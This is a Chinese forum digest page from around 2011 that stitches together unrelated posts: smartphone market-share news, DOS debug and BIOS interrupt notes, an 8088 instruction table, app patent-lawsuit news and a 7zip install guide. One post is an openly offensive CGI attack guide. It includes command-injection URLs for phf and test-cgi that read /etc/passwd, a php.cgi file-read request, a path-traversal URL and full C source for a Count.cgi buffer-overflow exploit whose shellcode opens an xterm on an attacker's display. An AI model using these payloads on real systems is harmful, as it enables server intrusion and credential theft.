苹果 Q2 财报将在今天发布（北京时间 7 月 20 日），ChangeWave 发布了一项调查数据，给苹果带来了两个好消息。
首先是购买心理倾向。46% 的人接下来三个月会选择买 iOS 设备，32% 的人选择了 Android ，仅有 4% 的人选择黑莓。
其次是消费满意度。苹果产品具有绝对的优势，70% 已经拥有 iPhone 的人表示对 iOS “非常满意”，50% 的人对 Android “非常满意”，Windows Mobile OS 和 RIM OS 的满意度分别是 27%、26%（其中对 Windows Phone 7 的满意度是 57%，但 WP7 产品少可选择性小）。
ChangeWave 的调查对象只是北美地区智能手机用户，由于北美尤其美国一直是 iPhone 传统地盘，Android 攻城掠地的风暴似乎还没有席卷到北美地区。来看英国《卫报》 6 月发布的数据，Android 在欧洲攻占多个城池。
英国：Android 45.2%（+34.5%）；iOS 18.3%（-12.3%）
德国：Android 41.3%（+38.2%）；iOS 18.4%（-9.2%）
法国：Android 37.5%（+16.4%）；iOS 17.9%（-13.3%）
意大利：Android 26.1%（+24.5%）；iOS 20.6%（+6.8%）
西班牙：Android 41.3%（+33.7%）；iOS 5.7%（-1.5%）
美国：Android 57%（+38%）；iOS 28.7%（+7.6%）
日本：Android 64.7%（+39.2%）；iOS 27.7%（-10.2%）
澳大利亚：Android 36.4%（+32.2%）；iOS 36.8%（+0.5%）
或者看它的趋势图，更加明了。其中绿线表示 Android 一年中增加的市场份额，紫线表示 iOS 一年中增加的市场份额。 Android 增长势头非常迅猛，市场占有率提高很快； iOS 则只在美国、意大利、澳大利亚保持增长。（点击查看大图）
当然，考虑到苹果产品更新周期较慢——相较于年初 26 万的设备激活量， 6 月 iOS 设备激活量下降到 21 万。 iPhone 5 延迟发布又给产品更新换代较快的 Android 扩张提供了充足的时间窗口。也许到了 iPhone 5、iPad 3 （iPad Pro ？）可能同时发布的金秋季节，才是王者归来，重新席卷圣诞购物季之时。
via  businessinsider
[查看全文]

本帖最后由 Sleepwalking 于 2011-7-19 13:01 编辑
win+R调出运行窗口，输入debug后弹出类似命令提示符的黑色窗口。这个就是debug啦
debug是个无所不能的命令，可以直接读写硬盘和内存！
下面是常用命令的解释：
（以下出现数字均为16进制）
u
读内存
比如说 u 100 就是从分配给debug的第100字节开始读。debug本身要占用100个字节，所以一半写汇编啥的都是从第100字节开始的。
还可以u 100,200 就是从第100字节开始读到第200个字节。（不过debug窗口有大小限制，塞不下这么多。。。）
a
写内存
a 100就是从第100个字节开始写。
r
修改寄存器参数
rcx rax ral..... 然后输入修改后的值回车
n
指定要操作的文件名
l
载入文件到内存（n指定的文件，从内存的第100字节开始载入）
也可以用l读扇区
w
写入指定文件（n指定的文件）
也可以用w改扇区
读、改扇区这么用：
l 100 2 0 1就是读取2号驱动器 从第零个扇区读，往后读1个扇区，读到内存的第100字节
w同理。
在进行读写扇区时不能使用windows自带的cmd，要使用dos执行。否则会弹错。你需要装个dos工具箱。
[查看全文]

CGI漏洞向来是容易被人们忽视的问题，同时也是普遍存在的，前不久攻破PCWEEK  LINUX的黑客就是利用了CGI的一个漏洞。我就自己所知道的和从外国站点看来的一些CGI漏洞来写一些利用CGI的攻击方法。
一、phf.cgi攻击：
phf是大家所熟悉的了，它本来是用来更新PHONEBOOK的，但是许多管理员对它不了解以至于造
成了漏洞。在浏览器中输入：
http://thegnome.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
可以显示出PASSWD文档来。其实还可以用更好的命令来实现目的：
http://thegnome.com/cgi-bin/phf?%0aid&Qalias=&Qname=haqr&Qemail=&Qnickna
me=&Qoffice_phone=
http://thegnome.com/cgi-bin/phf?%0als%20-la%20%7Esomeuser&Qalias=&Qname=
haqr&Qemail=&Qnickname=&Qoffice_phone=
http://thegnome.com/cgi-bin/phf?%0acp%20/etc/passwd%20%7Esomeuser/passwd
%0A&Qalias=&Qname=haqr&Qemail=&Qnickname=&Qoffice_phone=
http://thegnome.com/~someuser/passwd
http://thegnome.com/cgi-bin/phf?%0arm%20%7Esomeuser/passwd&Qalias=&Qname
=haqr&Qemail=&Qnickname=&Qoffice_phone=
以上等于执行了命令：
id
ls -la ~someuser
cp /etc/passwd ~someuser/passwd
(用普通的可以进入的目录来看passwd)
rm ~someuser/passwd
二、php.cgi
除了PHF以外，php也是常见的漏洞，php.cgi 2.0beta10或更早版本中，允许anyone以HTTP管
理员身份读系统文件，在浏览器中输入：
http://boogered.system.com/cgi-bin/php.cgi?/etc/passwd
就可以看到想看的文件。
另外，一部分php.cgi还可以执行shell，原因是它把8k bytes字节放入128bytes的缓冲区中，
造成堆栈段溢出，使得攻击者可以以HTTP管理员的身份执行。
但是只有PHP作为CGI脚本时才能实现，而在作为Apache模量是不能运行的。想检查能否运行，
只要在浏览器中输入：
http://hostname/cgi-bin/php.cgi
如果你看到返回这样的字样就可以运行：
PHP/FI Version 2.0b10
...
三、test-cgi的问题
test-cgi同样是个常常出现的漏洞，在浏览器中输入：
http://thegnome.com/cgi-bin/test-cgi?＼whatever
将会返回：
CGI/1.0 test script report:
argc is 0. argv is .
SERVER_SOFTWARE = NCSA/1.4B
SERVER_NAME = thegnome.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.0
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = text/plain, application/x-html,
application/html,
text/html, text/x-html
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = whatever
REMOTE_HOST = fifth.column.gov
REMOTE_ADDR = 200.200.200.200
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
再来一次，这样输入：
http://thegnome.com/cgi-bin/test-cgi?＼help&0a/bin/cat%20/etc/passwd
看到PASSWD了？
用netcat 80 端口 进行攻击：
machine% echo "GET /cgi-bin/test-cgi?/*" nc removed.name.com
80
返回：
CGI/1.0 test script report:
argc is 1. argv is /＼*.
SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = removed.name.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib
/mnt
/root /sbin /stand /sys /tmp /usr /usr2 /var                   REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
显示出了根目录！这样试试：
machine% echo "GET /cgi-bin/test-cgi?*" nc removed.name.com 80
返回：
CGI/1.0 test script report:
argc is 1. argv is ＼*.
SERVER_SOFTWARE = NCSA/1.4.1
SERVER_NAME = removed.name.com
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/0.9
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT =
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /bin/cgi-bin/test-cgi
QUERY_STRING = calendar cgi-archie cgi-calendar cgi-date
cgi-finger
cgi-fortune cgi-lib.pl imagemap imagemap.cgi imagemap.conf
index.html
mail-query mail-query-2 majordomo majordomo.cf marker.cgi
menu message.cgi munger.cgi munger.note ncsa-default.tar
post-query
query smartlist.cf src subscribe.cf test-cgi uptime
REMOTE_HOST = remote.machine.com
REMOTE_ADDR = 255.255.255.255
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =
显示了/CGI-BIN/目录下的东西。
四、Count.cgi溢出漏洞
Count.cgi（wwwcount）是国外网站经常用的CGI网页计数程序，国内很少有人用它，不过还是有一些网站的CGI-BIN目录下有它，简单说一下它的原理以及利用方法。出现问题主要是由于QUERY_STRING
环境变量被复制到一个活动缓冲区，造成溢出，允许远程用户以HTTP管理员的身份执行任意命令。
有人写了个程序来利用这个漏洞，只对Count.cgi 24以下版本有效：
/*### count.c
########################################################*/                   #include
#include
#include
#include
#include
#include
#include
#include
#include
/* Forwards */
unsigned long getsp(int);
int usage(char *);
void doit(char *,long, char *);
/* Constants */
char shell[]=
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90＼x90"
"＼xeb＼x3c＼x5e＼x31＼xc0＼x89＼xf1＼x8d＼x5e＼x18＼x88＼x46＼x2c＼x88＼x46＼x30"
"＼x88＼x46＼x39＼x88＼x46＼x4b＼x8d＼x56＼x20＼x89＼x16＼x8d＼x56＼x2d＼x89＼x56"
"＼x04＼x8d＼x56＼x31＼x89＼x56＼x08＼x8d＼x56＼x3a＼x89＼x56＼x0c＼x8d＼x56＼x10"
"＼x89＼x46＼x10＼xb0＼x0b＼xcd＼x80＼x31＼xdb＼x89＼xd8＼x40＼xcd＼x80＼xe8＼xbf"
"＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff"
"＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff"
"/usr/X11R6/bin/xterm0-ut0-display0";
char endpad[]=
"＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff"
"＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff＼xff";
int main (int argc, char *argv[]){
char *shellcode = NULL;
int cnt,ver,retcount, dispnum,dotquads[4],offset;
unsigned long sp;
char dispname[255];
char *host;
offset = sp = cnt = ver = 0;
fprintf(stderr,"＼t%s - Gus＼n",argv[0]);
if (argc<3) usage(argv[0]);
while ((cnt = getopt(argc,argv,"h:d:v:o:")) != EOF) {
switch(cnt){
case 'h':
host = optarg;
break;
case 'd':
{
retcount = sscanf(optarg, "%d.%d.%d.%d:%d",
&dotquads[0],
&dotquads[1],
&dotquads[2],
&dotquads[3], &dispnum);
if (retcount != 5) usage(argv[0]);
sprintf(dispname, "%03d.%03d.%03d.%03d:%01d",
dotquads[0], dotquads[1], dotquads[2],dotquads[3], dispnum);                   shellcode=malloc(strlen((char
*)optarg)+strlen(shell)+strlen(endpad));
sprintf(shellcode,"%s%s%s",shell,dispname,endpad);
}
break;
case 'v':
ver = atoi(optarg);
break;
case 'o':
offset = atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}
sp = offset + getsp(ver);
(void)doit(host,sp,shellcode);
exit(0);
}
unsigned long getsp(int ver) {
/* Get the stack pointer we should be using. YMMV. If it does
not work,
try using -o X, where x is between -1500 and 1500 */
unsigned long sp=0;
if (ver == 15) sp = 0xbfffea50;
if (ver == 20) sp = 0xbfffea50;
if (ver == 22) sp = 0xbfffeab4;
if (ver == 23) sp = 0xbfffee38; /* Dunno about this one */
if (sp == 0) {
fprintf(stderr,"I don't have an sp for that version try using
the -o option.＼n");
fprintf(stderr,"Versions above 24 are patched for this
bug.＼n");
exit(1);
} else {
return sp;
}
}
int usage (char *name) {
fprintf(stderr,"＼tUsage:%s -h host -d -v [-o ]＼n",name);
fprintf(stderr,"＼te.g. %s -h www.foo.bar -d 127.0.0.1:0 -v
22＼n",name);
exit(1);
}
int openhost (char *host, int port) {
int sock;
struct hostent *he;
struct sockaddr_in sa;
he = gethostbyname(host);
if (he == NULL) {
perror("Bad hostname＼n");
exit(-1);
}
memcpy(&sa.sin_addr, he->h_addr, he->h_length);
sa.sin_port=htons(port);
sa.sin_family=AF_INET;
sock=socket(AF_INET,SOCK_STREAM,0);
if (sock < 0) {
perror ("cannot open socket");
exit(-1);
}
bzero(&sa.sin_zero,sizeof (sa.sin_zero));
if (connect(sock,(struct sockaddr *)&sa,sizeof sa)<0) {
perror("cannot connect to host");
exit(-1);
}
return(sock);
}
void doit (char *host,long sp, char *shellcode) {
int cnt,sock;
char qs[7000];
int bufsize = 16;
char buf[bufsize];
char chain[] = "user=a";
bzero(buf);
for(cnt=0;cnt<4104;cnt+=4) {
qs[cnt+0] = sp & 0x000000ff;
qs[cnt+1] = (sp & 0x0000ff00) >> 8;
qs[cnt+2] = (sp & 0x00ff0000) >> 16;
qs[cnt+3] = (sp & 0xff000000) >> 24;
}
strcpy(qs,chain);
qs[strlen(chain)]=0x90;
qs[4104]= sp&0x000000ff;
qs[4105]=(sp&0x0000ff00)>>8;
qs[4106]=(sp&0x00ff0000)>>16;
qs[4107]=(sp&0xff000000)>>24;
qs[4108]= sp&0x000000ff;
qs[4109]=(sp&0x0000ff00)>>8;                   qs[4110]=(sp&0x00ff0000)>>16;
qs[4111]=(sp&0xff000000)>>24;
qs[4112]= sp&0x000000ff;
qs[4113]=(sp&0x0000ff00)>>8;
qs[4114]=(sp&0x00ff0000)>>16;
qs[4115]=(sp&0xff000000)>>24;
qs[4116]= sp&0x000000ff;
qs[4117]=(sp&0x0000ff00)>>8;
qs[4118]=(sp&0x00ff0000)>>16;
qs[4119]=(sp&0xff000000)>>24;
qs[4120]= sp&0x000000ff;
qs[4121]=(sp&0x0000ff00)>>8;
qs[4122]=(sp&0x00ff0000)>>16;
qs[4123]=(sp&0xff000000)>>24;
qs[4124]= sp&0x000000ff;
qs[4125]=(sp&0x0000ff00)>>8;
qs[4126]=(sp&0x00ff0000)>>16;
qs[4127]=(sp&0xff000000)>>24;
qs[4128]= sp&0x000000ff;
qs[4129]=(sp&0x0000ff00)>>8;
qs[4130]=(sp&0x00ff0000)>>16;
qs[4131]=(sp&0xff000000)>>24;
strcpy((char*)&qs[4132],shellcode);
sock = openhost(host,80);
write(sock,"GET /cgi-bin/Count.cgi?",23);
write(sock,qs,strlen(qs));
write(sock," HTTP/1.0＼n",10);
write(sock,"User-Agent: ",12);
write(sock,qs,strlen(qs));
write(sock,"＼n＼n",2);
sleep(1);
/* printf("GET /cgi-bin/Count.cgi?%s HTTP/1.0＼nUser-Agent:
%s＼n＼n",qs,qs); */
/*
setenv("HTTP_USER_AGENT",qs,1);
setenv("QUERY_STRING",qs,1);
system("./Count.cgi");
*/
}
————————————————————————————————————
用法是：count -h <攻击目标IP> -d <显示> -v                   例如：count -h www.foo.bar -d 127.0.0.1:0 -v 22
五、用Count.cgi看图片
这个不算是很有用的漏洞，可是既然写到这儿了，也就顺便提一下吧。可以利用Count.cgi看WEB目录以外的图片，据作者说有一些商业网站的图片里有一些商业机密，所以这个漏洞也算是有点用处吧！哈哈！
在浏览器中这样输入：
http://attacked.host.com/cgi-bin/Count.cgi?
display=image&image=../../../../../../path_to_gif/file.gif
其中/path_to_gif/file.gif是你要看的图片的路径。
注意，这一漏洞只能被用来看（或下载）GIF格式的图片，而不能用于其他类型的文件。
[查看全文]

本帖最后由 Sleepwalking 于 2011-7-19 10:53 编辑
这里的int不是取整的意思   汇编中的用于与外部交互的超重要的指令。分为DOS中断和BIOS中断。BIOS中断更加底层化。
写操作系统的人经常会用到的。
BIOS中断:
显示服务包括了很多重要的指令  比如显示字符、绘图等等。为招揽人气  我设回帖隐藏了
1、显示服务(Video Service——INT 10H) 
本内容已隐藏，回复后刷新可见哦
2、直接磁盘服务(Direct Disk Service——INT 13H)
00H —磁盘系统复位0EH —读扇区缓冲区
01H —读取磁盘系统状态0FH —写扇区缓冲区
02H —读扇区10H —读取驱动器状态
03H —写扇区11H —校准驱动器
04H —检验扇区12H —控制器RAM诊断
05H —格式化磁道13H —控制器驱动诊断
06H —格式化坏磁道14H —控制器内部诊断
07H —格式化驱动器15H —读取磁盘类型
08H —读取驱动器参数16H —读取磁盘变化状态
09H —初始化硬盘参数17H —设置磁盘类型
0AH —读长扇区18H —设置格式化媒体类型
0BH —写长扇区19H —磁头保护
0CH —查寻1AH —格式化ESDI驱动器
0DH —硬盘系统复位
(1)、功能00H
功能描述：磁盘系统复位
入口参数：AH＝00H
DL＝驱动器，00H~7FH：软盘；80H~0FFH：硬盘
出口参数：CF＝0——操作成功，AH＝00H，否则，AH＝状态代码，参见功能号01H中的说明
(2)、功能01H
功能描述：读取磁盘系统状态
入口参数：AH＝01H
DL＝驱动器，00H~7FH：软盘；80H~0FFH：硬盘
出口参数：AH＝00H，AL＝状态代码，其定义如下：
00H — 无错 01H — 非法命令
02H — 地址目标未发现03H — 磁盘写保护(软盘)
04H — 扇区未发现05H — 复位失败(硬盘)
06H — 软盘取出(软盘)07H — 错误的参数表(硬盘)
08H — DMA越界(软盘)09H — DMA超过64K界限
0AH — 错误的扇区标志(硬盘)0BH — 错误的磁道标志(硬盘)
0CH — 介质类型未发现(软盘)0DH — 格式化时非法扇区号(硬盘)
0EH — 控制数据地址目标被发现(硬盘)0FH — DMA仲裁越界(硬盘)
10H — 不正确的CRC或ECC编码11H — ECC校正数据错(硬盘)
CRC:Cyclic Redundancy Check code
ECC:Error Checking & Correcting code
20H — 控制器失败40H — 查找失败
[查看全文]

本帖最后由 Sleepwalking 于 2011-7-19 10:56 编辑
8088汇编指令表
一、数据传输指令
───────────────────────────────────────
它们在存贮器和寄存器、寄存器和输入输出端口之间传送数据.
1. 通用数据传送指令.
MOV 传送字或字节.
MOVSX 先符号扩展,再传送.
MOVZX 先零扩展,再传送.
PUSH 把字压入堆栈.
POP 把字弹出堆栈.
PUSHA 把AX,CX,DX,BX,SP,BP,SI,DI依次压入堆栈.
POPA 把DI,SI,BP,SP,BX,DX,CX,AX依次弹出堆栈.
PUSHAD 把EAX,ECX,EDX,EBX,ESP,EBP,ESI,EDI依次压入堆栈.
POPAD 把EDI,ESI,EBP,ESP,EBX,EDX,ECX,EAX依次弹出堆栈.
BSWAP 交换32位寄存器里字节的顺序
XCHG 交换字或字节.( 至少有一个**作数为寄存器,段寄存器不可作为**作数)
CMPXCHG 比较并交换**作数.( 第二个**作数必须为累加器AL/AX/EAX )
XADD 先交换再累加.( 结果在第一个**作数里 )
XLAT 字节查表转换.
── BX 指向一张 256 字节的表的起点, AL 为表的索引值 (0-255,即
0-FFH); 返回 AL 为查表结果. ( [BX+AL]->AL )
2. 输入输出端口传送指令.
IN I/O端口输入. ( 语法: IN 累加器, {端口号│DX} )
OUT I/O端口输出. ( 语法: OUT {端口号│DX},累加器 )
输入输出端口由立即方式指定时, 其范围是 0-255; 由寄存器 DX 指定时,
其范围是 0-65535.
3. 目的地址传送指令.
LEA 装入有效地址.
例: LEA DX,string ;把偏移地址存到DX.
LDS 传送目标指针,把指针内容装入DS.
例: LDS SI,string ;把段地址:偏移地址存到DS:SI.
LES 传送目标指针,把指针内容装入ES.
例: LES DI,string ;把段地址:偏移地址存到ES:DI.
LFS 传送目标指针,把指针内容装入FS.
例: LFS DI,string ;把段地址:偏移地址存到FS:DI.
LGS 传送目标指针,把指针内容装入GS.
例: LGS DI,string ;把段地址:偏移地址存到GS:DI.
LSS 传送目标指针,把指针内容装入SS.
例: LSS DI,string ;把段地址:偏移地址存到SS:DI.
4. 标志传送指令.
LAHF 标志寄存器传送,把标志装入AH.
SAHF 标志寄存器传送,把AH内容装入标志寄存器.
PUSHF 标志入栈.
POPF 标志出栈.
PUSHD 32位标志入栈.
POPD 32位标志出栈.
二、算术运算指令
───────────────────────────────────────
ADD 加法.
ADC 带进位加法.
INC 加 1.
AAA 加法的ASCII码调整.
DAA 加法的十进制调整.
SUB 减法.
SBB 带借位减法.
DEC 减 1.
NEC 求反(以 0 减之).
CMP 比较.(两**作数作减法,仅修改标志位,不回送结果).
AAS 减法的ASCII码调整.
DAS 减法的十进制调整.
MUL 无符号乘法.
IMUL 整数乘法.
以上两条,结果回送AH和AL(字节运算),或DX和AX(字运算),
AAM 乘法的ASCII码调整.
DIV 无符号除法.
IDIV 整数除法.
以上两条,结果回送:
商回送AL,余数回送AH, (字节运算);
或 商回送AX,余数回送DX, (字运算).
AAD 除法的ASCII码调整.
CBW 字节转换为字. (把AL中字节的符号扩展到AH中去)
CWD 字转换为双字. (把AX中的字的符号扩展到DX中去)
CWDE 字转换为双字. (把AX中的字符号扩展到EAX中去)
CDQ 双字扩展. (把EAX中的字的符号扩展到EDX中去)
三、逻辑运算指令
───────────────────────────────────────
AND 与运算.
OR 或运算.
XOR 异或运算.
NOT 取反.
TEST 测试.(两**作数作与运算,仅修改标志位,不回送结果).
SHL 逻辑左移.
SAL 算术左移.(=SHL)
SHR 逻辑右移.
SAR 算术右移.(=SHR)
ROL 循环左移.
ROR 循环右移.
RCL 通过进位的循环左移.
RCR 通过进位的循环右移.
以上八种移位指令,其移位次数可达255次.
移位一次时, 可直接用**作码. 如 SHL AX,1.
移位>1次时, 则由寄存器CL给出移位次数.
如 MOV CL,04
SHL AX,CL
四、串指令
───────────────────────────────────────
DS:SI 源串段寄存器 :源串变址.
ES:DI 目标串段寄存器:目标串变址.
CX 重复次数计数器.
AL/AX 扫描值.
D标志 0表示重复**作中SI和DI应自动增量; 1表示应自动减量.
Z标志 用来控制扫描或比较**作的结束.
MOVS 串传送.
( MOVSB 传送字符. MOVSW 传送字. MOVSD 传送双字. )
CMPS 串比较.
( CMPSB 比较字符. CMPSW 比较字. )
SCAS 串扫描.
把AL或AX的内容与目标串作比较,比较结果反映在标志位.
LODS 装入串.
把源串中的元素(字或字节)逐一装入AL或AX中.
( LODSB 传送字符. LODSW 传送字. LODSD 传送双字. )
STOS 保存串.
是LODS的逆过程.
REP 当CX/ECX<>0时重复.
REPE/REPZ 当ZF=1或比较结果相等,且CX/ECX<>0时重复.
REPNE/REPNZ 当ZF=0或比较结果不相等,且CX/ECX<>0时重复.
REPC 当CF=1且CX/ECX<>0时重复.
REPNC 当CF=0且CX/ECX<>0时重复.
五、程序转移指令
───────────────────────────────────────
1>无条件转移指令 (长转移)
JMP 无条件转移指令
CALL 过程调用
RET/RETF过程返回.
2>条件转移指令 (短转移,-128到+127的距离内)
( 当且仅当(SF XOR OF)=1时,OP1<OP2 )
JA/JNBE 不小于或不等于时转移.
JAE/JNB 大于或等于转移.
JB/JNAE 小于转移.
JBE/JNA 小于或等于转移.
以上四条,测试无符号整数运算的结果(标志C和Z).
JG/JNLE 大于转移.
JGE/JNL 大于或等于转移.
JL/JNGE 小于转移.
JLE/JNG 小于或等于转移.
以上四条,测试带符号整数运算的结果(标志S,O和Z).
JE/JZ 等于转移.
JNE/JNZ 不等于时转移.
JC 有进位时转移.
JNC 无进位时转移.
JNO 不溢出时转移.
JNP/JPO 奇偶性为奇数时转移.
JNS 符号位为 "0" 时转移.
JO 溢出转移.
JP/JPE 奇偶性为偶数时转移.
JS 符号位为 "1" 时转移.
3>循环控制指令(短转移)
LOOP CX不为零时循环.
LOOPE/LOOPZ CX不为零且标志Z=1时循环.
LOOPNE/LOOPNZ CX不为零且标志Z=0时循环.
JCXZ CX为零时转移.
JECXZ ECX为零时转移.
4>中断指令
INT 中断指令
INTO 溢出中断
IRET 中断返回
5>处理器控制指令
HLT 处理器暂停, 直到出现中断或复位信号才继续.
WAIT 当芯片引线TEST为高电平时使CPU进入等待状态.
ESC 转换到外处理器.
LOCK 封锁总线.
NOP 空**作.
STC 置进位标志位.
CLC 清进位标志位.
CMC 进位标志取反.
STD 置方向标志位.
CLD 清方向标志位.
STI 置中断允许位.
CLI 清中断允许位.
六、伪指令
───────────────────────────────────────
DW 定义字(2字节).
PROC 定义过程.
ENDP 过程结束.
SEGMENT 定义段.
ASSUME 建立段寄存器寻址.
ENDS 段结束.
END 程序结束.  
内容太多了，8086的指令表塞不下。。。附件吧
解压后100多个K，非常多的指令
招揽人气  回帖显示
本内容已隐藏，回复后刷新可见哦
[查看全文]

有一样的吗= =
[查看全文]

转自新浪科技
北京时间7月17日上午消息，由于担心遭到专利侵权诉讼，应用开发者正在从美国版苹果App Store和谷歌Android电子市场中撤下应用。近期，孟买一家公司对微软、苹果、谷歌、雅虎和其他一些公司提起了专利侵权诉讼。
　　在美国，软件专利所有者正试图通过专利权诉讼分享应用开发者的营收。对于开发者来说，即使在这类诉讼中胜诉，也将付出巨大的代价。因此，欧洲的开发者正在从美国的应用商店中撤下应用，避免因专利诉讼带来的损失。
　　英国一名开发者西蒙·麦道克(Simon Maddox)已经从美国版App Store和Android电子市场中删除了他的所有应用。他担心受到一家名为Lodsys的公司的起诉，该公司此前已经以软件专利侵权为由起诉了多名iOS和Android平台开发者。
　　另一名名为绍恩·奥斯汀(Shaun Austin)的应用开发者表示：“在美国出售软件已成为一种不可行的做法。”而一名名为弗雷瑟·斯佩尔斯(Farser Speirs)的开发者则表示，由于这些专利侵权诉讼，作为一名软件开发者，他担心自己的未来。
　　所有新兴智能手机平台上的专利侵权诉讼都在愈演愈烈，这是由于苹果、谷歌和微软等平台所有者未能为开发者提供保护。即使平台所有者已经签订了专利授权协议，目前也不清楚这样的协议是否适用于平台上的开发者。
　　这一情况导致开发者正离开这些平台。本周三，麦道克在Twitter上发布消息称，他将从美国的应用商店中删除所有应用，并对Lodsys的做法表示强烈不满。他表示，由于可能面临软件专利诉讼，因此在美国开展业务有着极大的风险。
　　不过对于美国的开发者来说，这一问题是无法回避的。应用开发商Iconfactory的成员克雷格·霍肯伯里(Craig Hockenberry)表示，尽管他们一直不认为事情会变得更糟，但事实与他们的期望相反。他将成为一名独立开发者，以便掌控自己的命运。Inconfactory也遭到Lodsys的起诉。
　　孟买一家软件公司Kootol Software已经对微软、苹果、雅虎、谷歌、IBM、RIM、LinkedIn、MySpace和其他多家公司提起诉讼，称这些公司侵犯了其专利，美国专利申请号为11/995,343。该公司表示，已在印度、加拿大和欧洲申请了同样的专利。
　　该公司表示，这项专利覆盖了消息发送、发行和实时搜索等核心领域，被告公司“可能在网站、网络、应用、服务、平台、操作系统和设备中侵犯了知识产权”。业内人士认为，由于美国专利商标局尚未正式批准这一专利申请，因此被告公司可以辩称，它们的产品是在这项专利申请之前就已存在。
[查看全文]

介绍:
7zip是一个开源的压缩软件，非常小巧，提供的功能和WinRAR差不多，但支持的格式几乎比后者多一倍。7z完全开源，包括压缩算法，而且还可以方便地使用它提供的库，在自己的程序中集成压缩功能。
安装：根据以下命令逐行执行
wget http://nchc.dl.sourceforge.net/s ... .65_src_all.tar.bz2
tar -xjvf p7zip_4.65_src_all.tar.bz2
cd p7zip_4.65
make
make install
看到以下信息，说明7zip安装成功。
./install.sh /usr/local/bin /usr/local/lib/p7zip /usr/local/man /usr/local/share/doc/p7zip
- installing /usr/local/bin/7za
- installing /usr/local/man/man1/7z.1
- installing /usr/local/man/man1/7za.1
- installing /usr/local/man/man1/7zr.1
- installing /usr/local/share/doc/p7zip/README
- installing /usr/local/share/doc/p7zip/ChangeLog
- installing HTML help in /usr/local/share/doc/p7zip/DOCS
命令行使用方式：
command为操作指令，如下：
a 添加到压缩文件
b 基准测试，测试7z当前性能
d 从压缩文件中删除
e 从压缩文件中解压缩，但不包含目录结构（即所有各级文件都解压到一个目录里）
l 列出压缩文件的内容
t 测试压缩文件
u 更新文件到压缩文件
x 从压缩文件中解压缩，包含目录结构
可见，最常用的指令是a, l和x.
具体使用，举几个例子就明白了：
压缩a.txt和b.txt到c.7z:
